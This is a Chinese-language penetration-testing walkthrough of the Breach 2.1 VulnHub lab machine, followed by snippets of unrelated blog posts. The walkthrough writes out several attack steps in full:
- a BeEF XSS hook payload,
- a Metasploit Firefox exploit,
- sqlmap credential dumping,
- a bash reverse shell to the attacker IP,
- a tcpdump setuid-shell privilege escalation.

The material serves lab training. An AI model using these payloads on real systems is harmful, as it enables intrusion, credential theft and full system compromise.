Breach 2.1靶机渗透

news2024/11/27 12:48:45

在这里插入图片描述

项目地址

```plain https://download.vulnhub.com/breach/Breach-2_final2.1.zip ```

实验过程

根据靶机的描述得知该靶机适用于静态ip,即192.168.110.151

配置虚拟机的虚拟网络编辑器的仅主机模式,将其子网IP配置在110网段,并将攻击机kali和靶机也设置为仅主机模式

然后开启靶机虚拟机

![](https://img-blog.csdnimg.cn/img_convert/aea5b4499317dab839f6958661f104e4.png)

使用nmap进行主机发现,获取靶机端口

```plain nmap -sV -p- 192.168.110.151 ```

根据对比可知Breach 2.1的ip地址为192.168.47.151,开放了111,44630,65535端口

信息收集

发现ssh服务开启,尝试ssh连接
ssh 192.168.110.151 -p 65535

得到一个用户名和密码

使用ssh远程连接Peter用户,却发现连接断开

ssh peter@192.168.110.151 -p 65535

重新扫描靶机开放的端口,发现又开放了一个80端口

nmap -sV -p- 192.168.110.151

访问网站

BEEF提示或许可以使用 beef-xss 这个xss工具

使用dirsearch对其目录扫描 发现两个目录 /blog /images

访问/blog目录

访问/images被拒绝

getshell

回到刚才的页面 通过验证注册框存在xss

这里需要用到之前提到的工具 beef-xss getshell

在kali上安装该工具

apt install beef-xss

安装完成后 输入beef-xss启动 需要自己设置密码

默认用户名 beef 完成登录

根据提示信息 我们注册框输入的xss语句如下

将127.0.0.1改成kali的ip地址

<script src="http://192.168.110.128:3000/hook.js"></script>
111
111

提交成功之后访问http://192.168.110.151/blog/members.html 即可触发漏洞

访问:http://192.168.110.128:3000/ui/panel,可以看到Kali和靶机都已上线

可以看到该网站的火狐版本很低 Firefox/15.0 可以利用利用版本漏洞

选择利用msf getshell

msfconsole
search firefox 15
use 12

show options
set uripath 123456(beef-xss设置密码)
set lhost 192.168.110.128
run

给出一个url

将给出中的url在浏览器中设置重定向访问

可以在msf中看到会话已经建立 ,速度较慢,需等待一些时间

因为通过 firefox_proto_crmfrequest 得到的shell不稳定,因此我们需要shell持久化

search post shell to meterpreter
use post/multi/manage/shell_to_meterpreter
options
set lhost 192.168.110.128

这时要再次点击 Execute按钮

根据新建立的 session Id 来设置 shell_to_meterpreter 的 options 中 session值

一旦建立session 立刻输入run 执行命令

输入sessions检查是否成功 直到看到meterpreter的session建立

获取shell

sessions -i 6
shell
whoami

cat /etc/passwd 发现了两个用户 milton blumbergh

sudo -l 将两个用户更新至user.list

milton用户提权

因为之前Peter用户无法ssh连接,查看相关配置
ls .ssh -al
ls /etc | grep ssh
ls /etc/ssh -al

sshd_config是客户端的ssh配置文件,在文件末尾发现,ssh连接过程会强制执行名为startme的程序,推测其与ssh无法成功连接有关

查看startme内容,其内容是启动了apache服务

覆盖 .bashrc 文件后,可以在ssh连接后可以保持shell

echo ‘exec /bin/bash’ > .bashrc

查看网站目录 看到html2目录

在其目录中存在 oscommerec

html2可能是一个新的web站点

查看靶机的网络信息

netstat -anlpt

发现一个2323端口

尝试使用telnet连接 显示了连接过程中的全部信息

telnet 127.0.0.1 2323

用google查询 发现这个地点位于Houston,作为密码输入

用户名的话也就是之前/etc/passwd文件中的用户名

经尝试用户名为 milton

我们需要回答一个问题:这个订书机是谁的

我们需要在目录下寻找关键词stapler

cd /usr
grep -rno stapler

发现一个 cd.py 文件 查看其内容

答案是mine

再次使用telnet连接2323端口

登录成功 实现milton用户提权

blumbergh用户提权

再次查看网络信息,出现了8888端口

尝试访问,点击oscommerce

对其目录扫描 发现了一个登录页面

在配置文件中发现,mysql数据库的root用户并没有设置密码

使用sqlmap进行读取数据

sqlmap -u http://192.168.110.151/blog/index.php?search=1 --batch
sqlmap -u http://192.168.110.151/blog/index.php?search=1 --dbs --batch
sqlmap -u http://192.168.110.151/blog/index.php?search=1 -D oscommerce --tables --batch
sqlmap -u http://192.168.110.151/blog/index.php?search=1 -D oscommerce -T osc_administrators --columns --batch
sqlmap -u http://192.168.110.151/blog/index.php?search=1 -D oscommerce -T osc_administrators -C user_name,user_password --dump --batch

得到管理员密码的哈希值

解密MD5免费在线解密破解_MD5在线加密-SOMD5

使用 admin:32admin 登录失败

使用 admin:admin 登录成功

四处翻翻发现一个上传文件的位置

上传文件

在 include目录下面找到了一个可写的目录

上传反弹shell 1.php文件

bash -i >& /dev/tcp/192.168.110.128/7272 0>&1

上传成功后访问http://192.168.110.151:8888/oscommerce/includes/work/1.php

kali开启监听

nc -lvvp 7272
sudo -l

可以使用tcpdump提权

辅助网站查看命令GTFOBins

cd /tmp
echo '#!/bin/bash' >> 1.sh
echo 'cp /bin/bash /tmp/shell' >> 1.sh
echo 'chmod +s /tmp/shell' >> 1.sh
chmod +x 1.sh
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/1.sh -Z root

cpdump 相关命令中包含lo参数,因此需要在 milton 用户终端中构造本地流量

telnet 127.0.0.1 2323

在 blumbergh 用户终端中提权

./shell -p

提权成功
好小子,离成功又近一步!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2206930.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

VSCode连接本地的虚拟机的一遍过步骤

一. 首先要在虚拟机的Linux上安装 openssh-server 1. 安装 sudo apt-get remove openssh-server # 先卸载&#xff0c;无论咋样都先做一下&#xff0c;以免出现问题 sudo apt-get install openssh-server # 安装 sudo service ssh --full-restart # 重启ssh 服务…

Java 17 面向对象编程(基础篇),快速了解面试对象编程

小熊学Java​站点&#xff1a;https://www.javaxiaobear.cn 本章汇总 学习面向对象内容的三条主线 Java类及类的成员&#xff1a;&#xff08;重点&#xff09;属性、方法、构造器&#xff1b;&#xff08;熟悉&#xff09;代码块、内部类 面向对象的特征&#xff1a;封装、继…

servlet基础与环境搭建(idea版)

文章目录 环境变量配置安包装环境变量配置JDK 配置 静态网页动态网页&#xff08;idea&#xff09;给模块添加 web框架新版本 2023 之后的 idea&#xff0c;使用方法二idea 目录介绍建立前端代码启动配置 环境变量配置 tomcat 环境变量 安包装 环境变量配置 JDK 配置 静态网页…

GA-BP回归预测 | MATLAB实现GA-BP多输入单输出回归预测

回归预测 | MATLAB实现GA-BP多输入单输出回归预测 目录 回归预测 | MATLAB实现GA-BP多输入单输出回归预测预测效果基本介绍模型描述遗传算法神经网络GA-BP网络程序设计学习总结参考资料预测效果 基本介绍 MATLAB实现GA-BP多输入单输出回归预测,输入7个特征,输出1个,优化权重…

Meta发布高质量3D物体重建数据集:推动空间计算与XR技术的发展

Meta(原Facebook)近日宣布推出一个全新的高质量3D物体重建数据集——Digital Twin Collection (DTC),旨在推动空间计算、扩展现实(XR)、智能眼镜以及基于AI的3D重建研究。该数据集包含超过2,400个物理对象的3D模型,具有亚毫米级的几何精度和高度逼真的视觉效果。本文将详…

electron-vite打包踩坑记录

electron-vite打包踩坑记录 大前端已成趋势&#xff0c;用electron开发桌面端应用越来越普遍 近期尝试用electronvite开发了个桌面应用&#xff0c;electron-vite地址&#xff0c;可用使用vue开发&#xff0c;vite打包&#xff0c;这样就很方便了 但是&#xff0c;我尝试了一…

vue后台管理系统从0到1(3)element plus 的三种导入方式

文章目录 vue后台管理系统从0到1&#xff08;3&#xff09;element plus 的三种导入方式element plus 引入方式完整引入按需导入手动导入 vue后台管理系统从0到1&#xff08;3&#xff09;element plus 的三种导入方式 element plus 引入方式 官方网址&#xff1a;https://el…

51单片机的万年历【proteus仿真+程序+报告+原理图+演示视频】

1、主要功能 该系统由AT89C51/STC89C52单片机LCD1602显示模块时钟模块按键蜂鸣器等模块构成。适用于电子万年历、数字时钟万年历等相似项目。 可实现功能: 1、LCD1602实时显示年月日星期和北京时间&#xff0c;具备闰年判断功能 2、按键可设置闹钟时间 3、按键可修改当前时…

vue后台管理系统从0到1(2)

文章目录 vue后台管理系统从0到1&#xff08;2&#xff09;前端项目构建nodejs版本开始构建 vue vite 项目项目清理项目依赖安装配置别名配置路由 vue-router vue后台管理系统从0到1&#xff08;2&#xff09; 前端项目构建 nodejs版本 因为我们是要构建一个 vue vite 的前…

Mycat引领MySQL分布式部署新纪元:性能与扩展性的双重飞跃

作者简介&#xff1a;我是团团儿&#xff0c;是一名专注于云计算领域的专业创作者&#xff0c;感谢大家的关注 座右铭&#xff1a; 云端筑梦&#xff0c;数据为翼&#xff0c;探索无限可能&#xff0c;引领云计算新纪元 个人主页&#xff1a;团儿.-CSDN博客 目录 前言&#…

滚花螺纹的工艺

滚花是一种车加工的加工方法&#xff0c;目的是增加零件表面的摩擦力&#xff0c;例如&#xff1a;千分尺的旋钮位置就滚花了&#xff0c;这样手在转动旋钮时不会打滑。滚花使用是滚花刀&#xff0c;滚花并不是去除零件表面材料&#xff0c;而是使用滚花刀挤压零件表面&#xf…

决战Linux操作系统

前言&#xff1a; 你是否也曾经为Linux所困扰过&#xff0c;在网上找的资料零零散散&#xff0c;是否学完Linux后还是懵懵懂懂&#xff0c;别怕&#xff0c;这篇博客是博主精心为你准备的&#xff0c;现在&#xff0c;就让我们一起来走进Linux的世界&#xff0c;决战Linux&…

软件性能测试概述

1. 常见的性能问题 访问12306的时候&#xff0c;由于访问量过高导致该app系统崩了&#xff1b; 2. 性能测试 测试人员借助测试工具&#xff0c;模拟系统在不同的场景下&#xff0c;对应的性能指标是否达到预期&#xff1b; 3. 性能测试和功能测试 功能测试&#xff1a;人工来完…

智能制造与精益制造的模型搭建

现行制造模式分析I-痛点改善思路-管控省优四化推行

Github上的Markdown语法详解

今天在看Win32文档参与编写的说明时&#xff0c;看到里面提及 Our documentation is written in Markdown, a lightweight text style syntax. If youre not familiar with Markdown, you can learn the basics on GitHub. When unsure, 刚好&#xff0c;今天就来做个全面的总…

PyCharm 项目解释器切换指南:如何在项目中更换 Python Interpreter

PyCharm 项目解释器切换指南&#xff1a;如何在项目中更换 Python Interpreter 文章目录 PyCharm 项目解释器切换指南&#xff1a;如何在项目中更换 Python Interpreter一 Settings 设置二 Project 选项三 Conda Environment四 更换 Environment 本文详细介绍了在 macOS 系统中…

02复写零

复写零 我们先进行异地复写&#xff1a;代码如下 public class Test {public static void main(String[] args) {int []array {1,0,2,3,0,4};duplicateZeros(array);}public static void duplicateZeros(int[] arr) {int [] elemnew int[arr.length];for(int cur0,dest0;des…

鼠标市场洞察:数据分析揭示消费趋势!

鼠标整体数据分析 一. 概述 本报告基于从淘宝商品搜索接口和淘宝精确月销量接口中提取的数据&#xff0c;分析了前百个品牌在销售额上的占比情况。分析涵盖了销售额和占比的数据&#xff0c;为决策提供了依据。(以上两个接口有需求的可以找我要链接&#xff09; 1. 大盘整体…

linux 安装gitlab

安装环境 CentOS 7.7 (centos6.10会报错)2g内存防火墙关闭 安装步骤&#xff1a; 1 安装gitlab # yum install -y git curl policycoreutils-python openssh-server # 安装依赖 # wget https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el7/gitlab-ce-10.2.2-ce…

Lucene 倒排索引

倒排索引是什么&#xff1f; 【定义】倒排索引&#xff08;Inverted Index&#xff09;是一种用于信息检索的数据结构&#xff0c;尤其适用于文本搜索。它与传统索引的主要区别在于&#xff0c;传统索引是根据文档来查找词语的位置&#xff0c;而倒排索引则是根据词语来查找文…